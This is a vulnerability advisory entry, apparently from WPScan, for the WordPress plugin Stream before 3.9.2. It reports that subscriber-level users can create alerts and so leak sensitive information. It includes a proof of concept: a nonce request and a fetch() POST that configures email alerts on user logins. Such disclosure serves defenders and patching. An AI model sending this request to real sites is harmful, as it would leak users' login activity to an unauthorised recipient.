Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:2B506252-6F37-439E-8984-7316D5CCA2E5
HistoryJan 16, 2023 - 12:00 a.m.

Stream < 3.9.2 - Subscriber+ Alert Creation

2023-01-1600:00:00
Krzysztof Zając
wpscan.com
13
plugin vulnerability
subscriber privilege
alert creation
leakage risk

EPSS

0.001

Percentile

33.5%

The plugin does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.

PoC

Step 1: Log in as a subscriber Step 2: Get a nonce from https://example.com/wp-admin/admin-ajax.php?action=get_new_alert_triggers_notifications Step 3: Configure the alerts via: fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” },“method”:“POST”, “body”: “action=save_new_alert&wp;_stream_alerts_nonce=XXXX&wp;_stream_trigger_author=&wp;_stream_trigger_context=users-sessions&wp;_stream_trigger_action=login&wp;_stream_alert_type=email&wp;_stream_alert_status=wp_stream_enabled&wp;_stream_email_recipient=recipient%40example.com&wp;_stream_email_subject=test”, });

EPSS

0.001

Percentile

33.5%

Related for WPVDB-ID:2B506252-6F37-439E-8984-7316D5CCA2E5